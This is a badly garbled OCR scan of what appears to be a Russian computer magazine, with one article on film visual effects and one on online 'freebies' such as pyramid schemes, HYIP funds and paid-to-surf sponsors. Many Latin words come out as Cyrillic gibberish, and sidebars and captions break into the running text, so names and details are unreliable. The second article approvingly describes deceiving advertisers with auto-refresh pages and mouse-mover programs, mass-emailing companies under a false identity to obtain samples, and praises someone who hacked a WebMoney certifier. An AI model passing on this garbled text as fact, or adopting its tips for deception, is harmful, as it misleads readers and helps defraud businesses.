супервайзер фильма «Ночной Дозор». 

настоящие. Прорабатывалась каждая деталь. Режиссер постоянно к че- 
му-то придирался, даже к скорости, с которой птицы махали крыльями. 
Мол, вороны так не летают. В кино мелочей не бывает, тем более, ког- 
да речь идет о первом плане. 

Бывают и такие ситуации, когда смоделировать надо целый город. 
Вспомни ту же «Матрицу», сцену, когда Нео впервые увидел, как выра- 
щивают людей. Все это чистой воды графика, а не декорации, то же са- 
мое касается вводного курса Морфея. Над этими сценами потели луч- 
шие ЗО-художники Голливуда. Для первой части «Матрицы» было раз- 
работано около 400 спецэффектов, для второй и третьей — намного 
больше. Если говорить о втором фильме, то самая интересная сцена — 
это битва Нео с двойниками агента Смита. На самом деле, актер, игра- 
ющий Смита, был один, все остальные — группа статистов в одинако- 
вых костюмах. Впоследствии при помощи монтажа лица актеров заме- 
нили на физиономии главного злыдня. Съемка эпизода делилась на три 
этапа. Первый — сам бой, то есть хореография. Именно на эти кадры 
позже наложат компьютерную графику. Далее идет процесс оцифровки 
реальных актеров с использованием чувствительной техники. Каждое 
движение, каждое сокращение мышц записывается строго без обработ- 
ки. Для того чтобы художники могли заменить лица статистов на лицо 
Смита, было произведено лазерное сканирование рельефа мышц. Отс- 
леживалось все, любое движение записывалось «в цифру», чтобы на 




думаешь, легко 
нарисовать такую? 



интерфейс 
ЗО Зіисііо Мах 



экране это смотрелось максимально реалистично. Тем более камер ис- 
пользовалось не так много, так как процесс просчета изображения с 
разных ракурсов был целиком возложен на компьютер. 

Кроме сцены драки, всем запомнились эпизоды с замедлением траек- 
тории пуль. Этот эффект получил название ВиІІеІ йте, и после выхода 
фильма был взят на вооружение многими режиссерами и создателями 
спецэффектов. Идея принадлежала мистеру Джону Гаете, известному 
по работе над визуальными эффектами в картине «Какие бывают меч- 
ты». Фильм даже получил Оскара в 1998 году за спецэффекты. Он же 
поставил грандиозную сцену сражения машин и людей в Зионе, благо- 
даря которой удостоился еще одного Оскара в 2000-м году. 

Помимо ВиІІеІ Ііте, есть и другие технологии, ставшие стандартом де- 
факто. Такие как Оідііаі СотрозШпд (модель собирается из множества 
изображений, сделанных с разных ракурсов), ЭоІІу гоот (эффект резко- 
го изменения размера изображения, придуманный Робертсом Ирме- 
ном), Оріісаі еііесі (освещение, увеличение, размытость, исчезающие 
объекты), а также многие другие, которые с разной частотой повторяют- 
ся в разных фильмах. Новые эффекты обычно разрабатываются для 
бюджетных фильмов, и стоят такие разработки недешево. Например, на 
создание спецэффектов ко второй «Матрице» было потрачено 100 мил- 
лионов долларов! Но даже реализация стандартного эффекта может 
влететь в копеечку, особенно это касается взрывов — самых дорогих и 
сложных элементов ЗО. Львиную долю бюджета современных боевиков 
«кушает» именно моделирование взрывов, не будут ведь пиротехники 
взрывать лимузин прямо в центре Нью-Йорка. 

[инструменты ГХ-мейкера] После того как съемки подошли к кон- 
цу, весь отснятый материал просматривается режиссером и делится 
на эпизоды продолжительностью от нескольких секунд до десятков 
минут. Это сделано для удобства редактирования и наложения спе- 
цэффектов — ресурсов компа может попросту не хватить для работы 
с цельным материалом. Затем, собственно, и начинается монтаж. Сна- 
чала грузится первый кусок, и режиссер начинает работать с ним: нак- 
ладывать уже готовые эффекты или прямо в кадре делать новый. В 
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клоны агента Смита в «Матрице» 



часто камеры делают динамичными, 
таким образом, камера крутится вок- 
руг объекта по определенной траек- 
тории. Разумеется, что из разных по- 
зиций камеры будут видны разные 
стороны объекта, а следовательно, 
для каждой точки на траектории при- 
дется подсчитывать отображение те- 
ней. Помимо теней, аниматор может 
использовать зеркала. Отражения 
окружающих предметов и освещения 
просчитывается компом отдельно. 

Другие инструменты для работы с 
30: АбоЬе Ргетіег — софтина, кото- 
рая считается любительской, и в серьезном монтаже практически не ис- 
пользуется, Аѵіб — невероятно дорогой и навороченный пакет стои- 
мостью порядка 65 тысяч долларов, РіпаІ Сиі — пакет, появившийся в 
1999 году и завоевавший популярность среди новичков благодаря срав- 
нительно быстрому освоению и невысокой цене. Каждый аниматор 
обычно работает только с одним 30-пакетом, хотя иногда с приходом в 
новую компанию приходится подстраиваться и юзать общий софт. 
Говоря о софте, хочется затронуть кадровую проблему. Дело в том, что 
обучиться профессии 30-художника довольно сложно, тем более в Рос- 
сии. Лекции многих вузов основаны на пакетах, которые в реале профи 
не используют. Из-за этого профессионалов в нашей стране очень ма- 
ло. Те же, кто пришли в 30 сегодня, оттачивали свои навыки самостоя- 
тельно на пиратских копиях программ, а уже когда становились на ноги 
и набирали опыт, переходили на легальный софт. 

Теперь поговорим о железках. Ты наверняка уже слышал, что дизайнеры и 30 - 
моделлеры для работы с графикой предпочитают Арріе. Компьютеры Арріе 
действительно лучше справляются с обработкой графики и звука, чем РС. Но 
есть еще один немаловажный фактор. Практически весь дизайнерский софт 
изначально затачивался под макинтоши и к тому времени, как на РС появи- 
лись альтернативы, профессионалы уже просто привыкли к своей платформе. 
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последнем случае остро встает проблема производительности. Прог- 
раммы, предназначенные для работы с 30, жадные до ресурсов ком- 
па, не говоря уже о мощностях, которые потребуются для просчета 
трехмерных моделей. Вернемся к эпизоду с воронами из «Ночного до- 
зора». Стоит поменять траекторию полета хотя бы одной птицы, и бли- 
жайшие час-полтора придется провести за ожиданием окончания рас- 
четов и вступления изменений в силу. Так что для работы РХ-мейкера 
терпение — очень полезное качество. 

Самой популярной программой для видеомонтажа является 30 Зіисііо 
Мах. В ней можно сделать все, что угодно. Любой эффект, любую ани- 
мацию — студия Макс дает разработчикам безграничные возможнос- 
ти. Стоит программный пакет недешево — $3000. Но за профессио- 
нальный инструмент и цена профессиональная. Как это происходит 
изнутри? Давай посмотрим. 

Главное окно программы разделено на четыре части — проекции. 
В каждой из них показан объект в разных измерениях. Так художнику 
легче ориентироваться и исправить недочеты. Создание спецэффекта 
начинается на этапе его проектирования. Тут учитывается расположе- 
ние эффекта по отношению к реальным кадрам, положение объектов 
в самом эффекте и много других дизайнерских фишек. После чего на- 
чинается этап построения — добавление элементов, создание траекто- 
рий, заливка текстур. Формируется ландшафт, его текстура, накладыва- 
ются стандартные и пользовательские эффекты. Далее происходит ус- 
тановка точек освещения и расположения камер. Это самый ресурсоем- 
кий этап, так как комп будет просчитывать направление световых лучей 
и на основе этого вычислять падение тени от встречных объектов. Даже 
если все объекты — это небольшие фигурки, просчет теней будет вес- 
тись достаточно долго. Затем происходит монтирование камер. Очень 



ГИГАНТЫ РХ-СЦЕНЫ 

СотріЛег Рііт Сотрапу — это целая фабрика по созда- 
нию спецэффектов. Компания имеет большой штат сот- 
рудников, пользуется высокой профессиональной репута- 
цией. На ее счету эффекты к таким хитам, как «ВІасІе 2», 
«Гарри Поттер», «Миссия невыполнима 2», «Мумия возв- 
ращается», «Везісіепі ЕѵіІ». 

ѴѴеІа 0\д\\а\ известна меньше, занимая в рейтинге киноа- 
гентств всего 101-е место из 500. Но аниматоры именно 
этой конторы трудились над спецэффектами для культо- 
вой трилогии Толкиена «Властелин Колец». И, как видно 
из успеха фильма и количества наград, справились со 
своей задачей очень неплохо. 

Нусігаиіх — еще одна Голливудская компания, влияние 
которой трудно переоценить. В списке ее клиентов есть 
режиссеры фильмов «Послезавтра», «Фантастическая 
четверка», «Константин», «Терминатор 3», «Приключе- 
ние Шаркбоя» и многих других. Помимо создания спе- 
цэффектов к фильмам, компания занимается изготовле- 
нием рекламных роликов. В ее портфолио входят такие 
рекламные ролики, как Соса-Соіа, ѴѴогІсІ о* ѴѴагСгаК, 
ѴѴОѴѴ Ве ѴоигзеІІ. 

Рассказывая о лучших компаниях Голливуда в области 
РХ, нельзя не упомянуть о ТірреМ Зіисііо. Вот только не- 
полный список картин, где не обошлось без их помощи: 
«Робокоп», «Люди в черном», «Вирус», «Миссия на 
Марс», «Человек-невидимка», «Единственный», «Эволю- 
ция», «Хэллбой», «Константин», «Матрица Революция». 







ЭКСКУРС В ИСТОРИЮ 

Впервые компьютерные эффекты 
были использованы в 70-х годах, в 
двух американских фильмах о взбун- 
товавшихся роботах: «Будущий мир» 
и «Западный мир». При помощи 
компьютера режиссеры хотели пока- 
зать окружающий мир глазами робо- 
та. Сделали они это, правда, прими- 
тивно — простейшие эффекты прос- 
то впихнули между кадрами. Связи с 
реальными сценами не было ника- 
кой. Первую попытку скрещивания 
реальных кадров с компьютерной 
графикой в 1977 году предпринял 
дядя Лукас в своей легендарной са- 
ге. И это был настоящий прорыв. 
Правда, спецэффектами в привыч- 
ном для нас понимании, первые ша- 
ги Джорджа назвать трудно. Над их 
созданием аниматор «Звездных 
войн» трудился около трех месяцев. 
Результат — виртуальная 30 карта 
Галактики, которую любой новичок 
ЗБ рендеринга сваяет за полчаса. Но 
не стоит забывать, что тогда у ани- 
маторов не было компьютерных 



мощностей, позволяющих ускорить 
процесс моделирования. В те време- 
на создание полнометражной карти- 
ны с обильным использованием 
компьютерной графики казалось не- 
реальным. Первыми, кто бросил вы- 
зов 30 , стали Стивен Лисбергер и 
Дональд Кушнер. В 1980 году они за- 
горелись идеей создания картины с 
использованием всех возможных РХ- 
инструментов, которые существова- 
ли на то время. Но, обойдя студии 
сильных мира сего, денег на начало 
работ так и не получили. Тогда Сти- 
вен Лисберг собственноручно сделал 
небольшой ролик с наложением ани- 
мации на реальные кадры и показал 
студии Диснея. Боссам понравилось, 
и они согласились финансировать 
проект. Сразу же объявились две 
компании, желающие заняться раз- 
работкой спецэффектов: МАОІ и 31. 
Любопытно то, что обе компании 
имели собственное представление о 
компьютерной графике, и оба их 
подхода были использованы в съем- 
ках картины. Подход первой компа- 



нии заключался в построении объек- 
тов при помощи простых фигур — 
прямоугольник, круг, квадрат. Специ- 
алисты 31 строили модели при помо- 
щи полигонов. На стороне МАОІ бы- 
ла скорость, на стороне коллег — 
реалистичность. Так или иначе, на- 
чавшиеся в 1981 году, съемки по- 
дошли к концу уже через год. Таким 
образом, мир увидел знаменитый 
фильм «Трон». Сюжет этого фильма 
был неоднократно использован позд- 
нее: злобный искусственный интел- 
лект решил поработить человечест- 
во, но на его пути встал смельчак, 
решивший разрушить имперские 
планы жестянки и спасти мир. Ниче- 
го не напоминает? Другим фильмом, 
который сделал революцию в мире 
спецэффектов, стал любимый многи- 
ми «Терминатор 2». Помнишь мо- 
мент, когда Т-1000 поднимается с 
клетчатого пола, принимая форму 
полицейского? Сделать в 1990 году 
такое было сложно, и ничего подоб- 
ного еще не видели. Поэтому смот- 
релось очень впечатляюще. 
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такие вот они, суперваизоры 



Помимо компьютера, перед анима- 
торами стоит вопрос выбора необхо- 
димого оборудования. Часто можно 
встретить целые наборы для видео- 
монтажа, включающие необходи- 
мые софт и железо. К таким набо- 
рам относится знаменитый Рго Тооіз 
— аппаратно-программный комп- 
лекс для записи и редактирования. 
Он состоит из десятка плат расши- 
рения (РСІ) и нескольких десятков 



внешних устройств, отвечающих за обработку звука и видео. Работает он 
под Макинтошем, а основу составляет плата МІХ Соге Сагб с шестью (!) вы- 
сокопроизводительными процессорами Моторола. Их задача — просчиты- 
вать наложенные эффекты, обрабатывать их и создавать новые. 

[супервайзоры] Забавно, но за всю историю 30 точного определения 
профессии людей, которые им занимаются, подобрать так и не смогли. 
За рубежом используют фразу ѴізиаІ ЕІІесІз (ѴРХ) Зирегѵізог — режиссер 
спецэффектов, человек, который отвечает за всю компьютерную часть 
фильма. Он работает как на съемочной площадке, так и в студии — коор- 
динирует работу и смотрит за совместимостью снимаемого и рисуемого 
материала. Понятно, что занять эту должность может только человек, хоро- 
шо разбирающийся сразу в двух областях — кино и компьютерный монтаж. 
Зачастую супервайзоры имеют кинообразование. За последнее время чис- 
ло спецэффектов в фильмах увеличилось, следовательно, прибавилась 
работа и супервайзерам. Они стали практически вторыми режиссерами. 



Как уже было сказано выше, при съемках фильма заказы на изготов- 
ление спецэффектов отдаются разным студиям. За поиск достойных 
кандидатов, заключения с ними договоров и оценку результатов отве- 
чает ОѵегаІІ Зирегѵізог. 

Оп-зеі Зирегѵізог — это человек, который консультирует режиссера, 
указывая на необходимость корректировки определенных сцен для то- 
го, чтобы в будущем художники смогли реалистично добавить эффект. 
Он находится непосредственно на съемочной площадке и управляет ра- 
ботой пиротехников, каскадеров и другими людьми, задействованными 
в подготовке кадра. На этом иерархия не заканчивается. Далее идут ру- 
ководитель студии, человек, наблюдающий за созданием эпизода, еще 
один вайзор смотрит за выполнением кадра и т.д. В общем, за каждым 
спецэффектом стоит целая команда специалистов. 

[заключение] Как видишь, съемки фильма — занятие хоть и интерес- 
ное, но невероятно трудоемкое. Моменты, которые зритель может даже 
не заметить, могут прорабатываться по несколько недель. Мы восхища- 
емся эффектом замедления времени, но почему-то совсем не обраща- 
ем внимание на город машин и последнее пристанище людей Зион, 
воспринимая его как что-то естественное. А ведь если бы все было сде- 
лано без компьютерных технологий, люди сразу бы заметили рисован- 
ные декорации, куклы героев и другие вещи. Заметили и раскритикова- 
ли бы «в ноль». Режиссеры потенциальных блокбастеров должны от- 
дать на создание спецэффектов, как минимум, несколько десятков мил- 
лионов долларов. Ведь зрители теперь ходят в кинотеатр не только за 
хорошей актерской игрой и сюжетом. Им нужны зрелища, новые впе- 
чатления. Технологии прочно заняли место на службе Голливуда © 







ЮНИТЫ КРЕАТИФФ КОДИНГ ІЛЧІХОЮ [СЦЕНА] ВЗЛОМ ИМПЛАНТ ]РС_20ЫЕ] РЕВВІІМ НЬЮСЫ 






На вершине пирамиды 

Пару слов о сетевой халяве 



РАЗГЛЯДЫВАЯ ЕЖЕМЕСЯЧНЫЕ СЧЕТА ОТ ПРОВАЙДЕРА, ТЫ НАВЕРНЯКА ЗАДУМЫВАЛСЯ О ТОМ, ЧТО ИНТЕРНЕТ — 
ЭТО НЕ ТОЛЬКО ГОЛЫЕ ТЕТКИ И МНОГОЧАСОВЫЕ БЕСЕДЫ ПО АСЬКЕ, НО И ХОРОШАЯ ВОЗМОЖНОСТЬ ЗАРАБО- 
ТАТЬ. ТОЛЬКО ВОТ РАЗМЕЩЕННЫЙ НА БЕСПЛАТНОМ ХОСТИНГЕ ПОРНОСАЙТ ЗАКРЫВАЮТ, ОНЛАЙНОВЫЙ МАГА- 
ЗИН УМЕР НА СТАДИИ РАЗРАБОТКИ ДВИЖКА, НА Е-ВАУ НИКТО НЕ ПОКУПАЕТ СТАРЫЙ БАБУШКИН БУДИЛЬНИК 
ЗА 300 БАКСОВ. А ВЕДЬ ТВОЯ ДУША НАПОЛНЕНА ВЕРОЙ НАШИХ ПРЕДКОВ — ВЕРОЙ В КОММУНИЗМ, ТО ЕСТЬ 
ВЕРОЙ В ХАЛЯВУ... 

I Илья Александров (іІуа_аІ@гатЫег.ги) 



[МиІіі-ІеѵеІ-тагкеііпд] Халявы в глобальной паутине хватает. Я бы да- 
же сказал, ее подозрительно много! Взять, например, различные МІ_М- 
проекты (МиШ-І_еѵеІ Магкейпд), а по нашему — финансовые пирамиды. 
Придумали их задолго до компьютерной эры, а первым финансистом стал 
Карл Ренборг, изобретатель пищевых добавок. Правда, в магазинах их 
никто не покупал, что никак не устраивало Ренборга. В конце концов му- 
жичок раздал коробки с чудо-продуктом своим друзьям, объяснив, что они 
должны рекламировать его среди знакомых и продавать, а он за каждую 
проданную упаковку будет платить комиссионные. Друзья от халтурки не 
отказались, и дело пошло. Скоро пищевыми добавками торговали знако- 
мые знакомых, затем их знакомые, пополняя нижние слои пирамиды. Так, 
не вложив ни доллара в рекламу своего продукта, американский предпри- 
ниматель достиг оборота в 7 миллионов долларов и навсегда вписал свое 
скромное имя в историю мировой экономики. 

С появлением Интернета количество желающих зарабо- 
тать на пирамидах только увеличилось. Ведь людей, 

«клюющих» на лозунг «Вложи бакс, ничего не делай, по- 
лучи 5 баксов», хватало всегда. Поэтому в конце 90-х, 
когда рунет стал набирать обороты, пирамиды стали его 
неотъемлемой частью. В это время, правда, еще не угас- 
ли воспоминания об ОАО «МММ» и товарище Мавроди. 

Люди были настроены скептически, и специально для 
них появилась куча текстов о том, чем МІ_М отличается 
от МММ, и почему финансовые пирамиды — это круто. 

Успешных сетевых пирамид в истории было предоста- 
точно. Несколько лет назад большой популярностью 
пользовалась пирамида ОІоЬаІ Визіпезз Ргоіесі (ОВР). 

Суть ее такая: имеется книга Сергио Пикапье «Колыбель 
для разума», разбитая на 4 части. Первая часть стоит 
полтинник, вторая — 100 рублей, третья — 150, четвер- 
тая — двести. Вежливо промолчу, что 500 рублей за 
электронную книгу — это нечто, и на лотках бумажный 
вариант можно купить в 3 раза дешевле. Зато тебе бесп- 
латно дадут первую часть книги, которую и надо загнать 
20 покупателям. После этого остается купить последние 
три части и «выполнять заказы, рассылая книги другим». 

И тогда начнешь получать сверхприбыль: от 1 до 20 мил- 
лионов рублей. Сомневаюсь, что столько заработал сам 
автор книги. А чтобы заработать эти деньги распростра- 
нителю — во всем рунете столько лохов не найдется. 

Еще одна красивая аббревиатура — ВМІ (Вісііпезз Мадіс Ьу Іпіегпеі). Здесь 
нам обещают, практически гарантируют, три миллиона рублей. Как пишут 
на их сайте, компанию разработал обычный японский гений Миямото Ичи- 
кава, который, анализируя работу финансовых пирамид, расстроился, что 
бабки получают только те, кто оказался на вершине. И чтобы более поздним 
участникам не было обидно, разработал «гениальную суперпрограмму», 
обеспечивающую деньгами всех. Достигается это якобы за счет того, что 
после завершения одного цикла продаж начинается следующий цикл, и ес- 
ли ты не успел получить доллары в пределах первого цикла, то тебе выпла- 
тят компенсацию в 10000 баксов. Не совсем ясно, что в этой пирамиде про- 
дают — видать, не суть важно, главное, чтобы посетитель сайта понял, что 
ему дадут много денег и просто так. Меня искренне поразило, что на сайте 

есть информация о том, что прог- 
рамма Миямоты усовершенствова- 
на... фирмой МісгозоШ Интересно, 
знает ли старина Билли, что ему те- 



перь приписывают участие в финансовой пирамиде, причем роль практи- 
чески организатора. Но это не единственное, что смущает во ВМІ. Вступая в 
программу, ты должен сделать смешной взнос — 100 рублей. Какой толк 
людям, для которых не проблема отдать тебе 10 тысяч убитых енотов, брать 
сотню деревянных? Не понимаю. Также подозрительно смотрится внизу 
главной страницы надпись «(С)ВМІ 1998-2000». Видать, мегасистема, ода- 
ривающая любого миллионами, больше пары лет не протянула. 

Но самой популярной (и самой тупой, на мой взгляд) стала схема с 
ВЕРОВТ'ами. Тебе на мыло приходит письмо, где предлагают принять учас- 
тие в очередной пирамиде. Для этого достаточно перевести по доллару на 
ѴѴМ2-счет каждому из списка четырех человек. Взамен ты получишь четы- 
ре электронные книги (а говорите, у нас нация читать перестает. Да полови- 
на МІ_М-пирамид на книжках живет! В смысле, жила). Теперь меняй имя пер- 



вого чела в списке на свое, вбивай номер кошелька, запускай спам-рассыл- 
ку и жди, когда тебе пришлют баксы за заказанную у тебя книгу. Хотя, как 
показывает практика, на твой кошель вряд ли упадет больше пары баксов. 

[последствия М1.М] Но не все коту масленица. В США организаторы 
пирамиды ЗкуВіг.сот, нагревшие наивных юзеров на 175 миллионов 
долларов, получили обвинения по статье «мошенничество в особо круп- 
ных размерах». В афере приняли участие жители 150 стран мира, в том 
числе и России. Пользователи платили 150 долларов, получали место 
для своего сайта на сервере компании, набор компьютерных учебных 
программ, которые и планировалось распространять, и, естественно, 
возможность заработать пару миллионов для семейного бюджета. Ор- 
ганизаторы, получив кучу бабок, взамен ничего не дали, и, скорее все- 
го, по-тихому слились бы куда-нибудь на Гавайи, но уж больно велика 
была сумма. Их деятельностью заинтересовались американские власти, 
и теперь предприимчивым кидалам грозит около 20 лет тюрьмы. 



После того как юзеры реже стали «клевать» на затею 
с пирамидами, предприимчивые товарищи придумали еще 
один «относительно честный способ отъема денег у граждан». 
Этот способ называется НУІР (Нідіі ѴіеІсІ ІпѵезІтепІ Ргодгатз). 
НУІР можно сравнить со вкладом в банк. Ты отдаешь деньги и 
со временем получаешь их с процентами. Но в высокодоходных 
фондах проценты на порядок больше банковских — в среднем 
2% в день. Как утверждают создатели, такой высокий процент 
обеспечивает их способ заработка. Они играют на рынке ва- 
лют, покупают и продают акции. В общем, огромными деньгами 
ворочают. Есть НУІР, работающие по типу пирамиды, здесь 
тебе будут выплачивать по 10% от дохода рефералов (людей, 
которых ты привлек в систему). Самый популярный фонд сей- 
час — это В&М Ргодгат, выплачивающий по 20% в месяц. 
Впрочем, присоединяться уже поздно: фонду 569 дней, а это — 
рекорд. Обычно подобные конторы живут не больше полугода. 
На самом деле, НУІР еще опасней, чем МІ_М. В пирамидах хотя бы 
обещают выплачивать, и те, кто наверху, даже что-то получают. 
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очередное предложение типа «17 000$ за три месяца : 



Раздел МІ_М следует поместить в раздел «фантастика» 



рейтинг НУІР-проектов 



В Белоруссии некий Александр Жданов организовал аж 4 интернет-пирами- 
ды. Правда, смысл в каждой один — вложи десять долларов и получи на 
400% больше. Прибыль Саши составила 4 миллиона американских прези- 
дентов. Когда пирамида лопнула, ни один из участников пирамиды против 
Жданова ничего не имел, так как белорус заранее предупредил 
о риске, связанном с вложением денег. А попался он случайно, вступив 
в конфликт с единственным в Белоруссии аттестатором ѴѴеЬМопеу при по- 
пытке снять $100 000. Тот признал деньги подозрительными и задержал 
платеж. Но все-таки дяденька вызывает уважение: взломал 1/1 /еЬМопеу.Ьу и 
снял не только свои деньги, но и весь кэш аттестатора! Пострадавший зая- 
вил куда надо, и в итоге наш герой получил 9 лет лишения свободы. 

Бум сетевых пирамид, начавшийся в конце девяностых, сегодня почти пол- 
ностью сошел на нет. Сетевой народ понемногу умнеет, и на заманчивые, но 
сомнительные предложения ведется редко. 

[спонсоры] Другим интересным феноменом Интернета стали так называ- 
емые спонсоры. Начнем с компаний, которые отдавали деньги за ѴѴЕВ-сер- 
финг. Культовую Зресііа помнят все. Главным образом потому, что она 
действительно платила. Получать бабки за просмотр рекламы — просто 
сбывшаяся мечта русского человека! Вообще, компания Зресііа появилась 
еще в 1 990 году, и тогда занималась расклейкой объявлений и размещени- 
ем рекламы. Но во время всемирной компьютеризации руководители поня- 
ли, что реклама в Сети не менее эффективна, чем на телевидении и радио. 
Человек, увидев по телику лицо африканской национальности с явными 
признаками шизофрении, яростно пожирающее сникерс, скорее переклю- 
чит на другой канал, чем купит шоколадку. Спедия гарантировала рекламо- 
дателю, что его рекламу увидят. Ведь она платила за просмотр деньги. Про- 
исходит это просто: на твоем компьютере размещается специальная прог- 
рамма (ѵіеѵѵ-бар), которая не перекрывается другими окнами и вынуждает 
пользователя постоянно смотреть рекламу. Отходить от компа тоже нель- 
зя. Если мышь долго находится без движения, то демонстрация баннеров 
прекращается. За час просмотра Зресііа платила 30 центов — вроде бы ко- 
пейки, но копейка к копеечке, а получается рубль. Дополнительные деньги 
начислялись за просмотр рекламы, приходящей на мыло, и за очки, наб- 
ранные в онлайновых играх на зресііа.пеі. За каждого приведенного в сис- 
тему нового пользователя, контора выплачивала 10% от его дохода. В 2000 
— 2001 годах ѵіеѵѵ-бар Зресііа стоял чуть ли не у каждого второго интернет- 
чика, а основными «клиентами» системы являлись жители бывшего СССР. 
Вирмейкеры даже написали троян, позволяющий получить доступ к аккаун- 
ту пользователя зресііа.пеі. 



Но всему хорошему приходит конец. В середине 2001 года юзеры, зашедшие на 
зресііа.пеі, увидели надпись: «Еггог 404 — страница не найдена». На этом выпла- 
ты закончились. Сейчас сайт вернулся к нормальному функционированию, мож- 
но даже скачать и установить ѵіеѵѵ-бар, но чеков ты уже не дождешься. 

Еще очень популярна была система СазПРіезІа, отличавшаяся от Спедии 
только расценками и дополнительными фишками типа развитой рефераль- 
ной системы и навороченного бара. 

Около года назад, каюсь, сам ввязался в это дело — зарегался в Риззіап Зиіі 
йоНаг. Но то ли серфер из меня никудышный, то ли спонсор пожадничал. В об- 
щем, никаких бабок на ѴѴМ я не получил. С тех пор не верю в халяву в инете, 
да и в халяву вообще. Хотя некоторые верят. Например, любители почитать 
спам за центы. Такую услугу предлагал, например, ІпЬохОоІІагз. Платил по 5 
центов за письмо. В письме — ссылка. Идешь по адресу, вводишь пароль, по- 
падаешь на сайт и. . . ура! Ты стал богаче! Хоть и на пять центов. Зато бабки ин- 
боксдолларз высылал стабильно, быть может, высылает и сейчас. 

Еще как-то была популярна тема с регистрациями, устроенная компанией 
Зеіесііѵе СІіскз. Нужно было зарегистрироваться на сайте и выполнять нес- 
ложные задания. Потом в Сеть попала таблица ответов на эти задания, мож- 
но было использовать ее для быстрого получения денег: от 80 центов до 4 
долларов за задание. Теперь это уже неактуально, а жаль. 

Да и вообще, как только юзеры не дурили спонсоров! 

Зресііа предоставляла пользователю сайт уоигіодіп. зресііа леі, при заходе на 
которой требовалось ввести логин и пароль. Затем выскакивало рор-ир 
окошко с рекламой, за просмотр которой юзер получал деньги так же, как 
при использовании ѵіеѵѵ-бара. Правда, периодически — примерно раз в ми- 
нуту — требовалось обновлять страничку, перезагружая рекламу. Народные 
умельцы сконструировали ПІтІ-страницу, в которой реклама Зресііа обнов- 
лялась автоматически, нужно было лишь загрузить самопальный хтмл-файл 
на какой-нибудь бесплатный хостинг и зайти на портал браузером. А потом 
идти спать, чтобы на утро подсчитать заработанный кэш. 

При высоких разрешениях (типа 1280x1024) некоторые ѵіеѵѵ-бары начи- 
нали показывать не один, а два баннера спонсора, принося двойную 
прибыль. Особо талантливые даже писали собственные программы, ко- 
торые перемещали курсор мыши каждую минуту, демонстрируя, что ни- 
какого простоя на компе нет. Хотя пользователь мог в это время тихо 
спать на диванчике. Я же, когда был юзером ВизЗегЮоІІаг, использовал 
программу организации виртуальных рабочих столов (подобная фишка 
хорошо знакомо юниксоидам. Виндузятники ее обычно не используют, 
хотя соответствующих программ навалом ): на одном рабочем простра- 
нстве запускал бар, а на втором — преспокойно работал :). 








К сожалению, со временем большинство спонсоров оказалась банкротами. 
До рекламодателей начало доходить, что рекламу в баннерах никто не смот- 
рит, и они перестали вкладывать деньги в сетевых спонсоров. Поэтому на 
сегодняшний день получить центы за спам и клики по баннерам, скорее все- 
го, не удастся. А в развитых странах про это уже давно забыли. В той же 
Америке выгоднее разносить газеты, чем смотреть рекламу на мониторе. 

[халявные погремушки] Йоу, нигга. Это майндворк. Мой коллега рассказал 
тебе о двух способах получить халяву в Сети, ничего не делая. Я расскажу о 
третьем. Когда-то давно, когда Интернет я видел только на картинках, а все свое 
время проводил в Рісіо, настоящим откровением для меня стало то, что многие 
буржуйские компании с удовольствием высылают разного рода ВЕЩИ. Журна- 
лы, каталоги, СЭ, видеокассеты, косметику, одежду, лекарства, пробники пище- 
вых продуктов и даже компьютерное барахло. Причем это никакое не кидалово, 
все это реально приходит к тебе с доставкой на дом, по твоей просьбе. Зачем 
это компаниям? Все просто — делается это ради рекламы, и буржуи надеются, 
что в результате такой щедрости ты станешь их клиентом и будешь покупать их 
продукцию. Так вот, году эдак в 98-м в фидошной эхе ВІІ.НАІ.ѴАѴА сформиро- 
валось целое движение халявщиков, промышляющих заказами. Народ обмени- 
вался информацией, как правильно оформлять заказы на халяву, ссылками на 
формы, которые предлагалось заполнить для получения сидюка или какой-ни- 
будь футболки. И, конечно, было много идей, как этот процесс оптимизировать. 
В ранние времена заказывать вещи было не совсем удобно. Линков на сайты 
благоделей было мало, и пионерам халявы приходилось все искать самостоя- 
тельно, вбивая в поисковики фразы типа Ігее затріез и деі Тог Ігее. Затем стали 
ходить списки халявы, которые постоянно пополнялись, фильтровались и даже 
имели какой-то рейтинг. Так как в одном таком списке могло быть несколько ты- 
сяч адресов, а народ у нас ленивый (даже когда дело заходит о халяве), то поя- 
вились программы. Благодаря одной такой программе несколько месяцев мой 
почтовый ящик (не электронный, обычный) ежедневно ломился от всевозмож- 
ных конвертов с американским обратным адресом. Программа занималась тем, 
что из списка выдирала электронные ящики (если ящик не был указан, а только 
линк сайта, она генерировала ящик, подставляя определенные слова. Напри- 
мер, есть адрес зргау.сот, на выходе получался іпІо@зргау.сот ) и автоматичес- 
ки рассылала на них заранее приготовленный текст заказа. Обычно текст выг- 
лядел примерно так: «Здравствуйте, меня зовут Вася Пупкин, я менеджер ком- 
пании «Рога и Копыта». Очень про вас наслышан и про дезодоранты ваши ве- 
ликолепные. Вам, наверное, не помешают распространители в нашей стране? 
Думаю, мы могли бы сотрудничать. Только вот хотелось бы познакомиться с ва- 
шей продукцией поближе. Поэтому не могли бы вы прислать мне парочку проб- 



ников ваших замечательных парфюмов? Большое спасибо. С уважением Вася 
Пупкин». Для получения брошюр, рекламных СЭ и других пустяков хитросплете- 
ния фраз были не обязательны. Достаточно коротко написать: «Вышлите, пожа- 
луйста, ваш СЭ. Спасибо», и через пару-тройку недель он уже лежал у тебя 
в мейлбоксе. В лучшие времена мне удавалось отправлять по 500 заказов в 
день (для этого достаточно буквально нажать одну кнопку), из которых добрая 
треть возвращалась в виде красочных безделушек. Причем некоторые компа- 
нии усердствовали даже чересчур. Один образовательный институт присылал 
мне свои рекламные буклеты и СО с предложением пройти их трехдневный курс 
бизнес-школы всего за 10 тысяч евро на протяжении полутора лет! 

Конечно, большинство этого спама практической ценности не имеет 
и отправляется в мусорное ведро сразу. Но иногда приходят полезные 
вещи. Например, я получал набор из 6 СО с научными передачами 
о космосе от какого-то канадского университета, коллекцию пробни- 
ков последней серии кремов для загара от ведущей косметической 
компании, пачку видеокассет, которые можно использовать для своих 
целей, пару-тройку цивильных футболок, бесчисленное количество до- 
рогих журналов на английском языке. Журналы, правда, я получал от- 
дельно, находя в Сети линки на зарубежные издательства и представ- 
ляясь потенциальным автором, просил один номер журнала для озна- 
комления. Многие высылали. 

Случались и казусы. Халявщики из ВІІ.НАІ_ѴАѴА обычно бомбили все про- 
ходящие в эхи ссылки и емейлы подряд, отсылая пачками заказы. Однаж- 
ды мне пришло письмо от какой-то христианской организации, которая вы- 
разила тревогу в связи с обрушившимся на них количеством писем из Рос- 
сии, содержащих одинаковую просьбу выслать их каталог. Организация 
